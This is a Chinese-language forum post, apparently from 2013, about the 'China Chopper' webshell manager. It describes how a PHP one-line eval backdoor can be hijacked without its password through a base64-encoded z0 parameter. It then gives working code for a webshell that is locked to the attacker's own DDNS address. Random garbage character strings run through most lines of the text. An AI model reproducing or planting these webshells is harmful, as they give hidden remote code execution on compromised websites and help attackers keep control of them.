今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
% j+ f+ q+ T- J# @# l5 q
, {" N& [* ~" [7 U. x( e, H% z就算你设置了密码,使用了eval($_REQUEST['moyo']);
$ {: G3 ^0 i w0 y! ^" h6 k# `" m& X8 t3 f8 z" A
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
; X. N" M0 d, E- Y5 [+ y
# [5 A# w8 _$ p/ o1 k0 j0 ~1 m因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));# E3 b' M6 I) A) r
% }, }- m& P7 R+ M- l
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
7 {! @/ `" H) _' W% T4 |1 i, ~9 l
+ b B/ k8 G5 g5 t: F* X) y不知道是设计缺陷还是故意留的后门2 X2 ~, \+ ?( l
5 }. c# U$ [1 F如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用5 k+ O- E3 P' C6 b3 q8 Z
" ~' P( Y! Q* c8 R4 [本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org7 u. A( c6 O$ b. P, |9 W
3 \" f; ~$ N6 J' @
然后一句话后门这样写' A: A7 s- c/ R2 {+ Q4 K x; n. G7 q
8 k9 Y) [! A0 J2 Y0 N<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>8 H" ~' |/ \- A3 m# e3 B4 n
这样就可以让一句话后门只允许自己的电脑连接了
2 s# R1 X# l& V7 N! q2 ^4 V' B% ?) @: f8 M
|
发表于 2013-7-26 12:45:48
收藏
支持
反对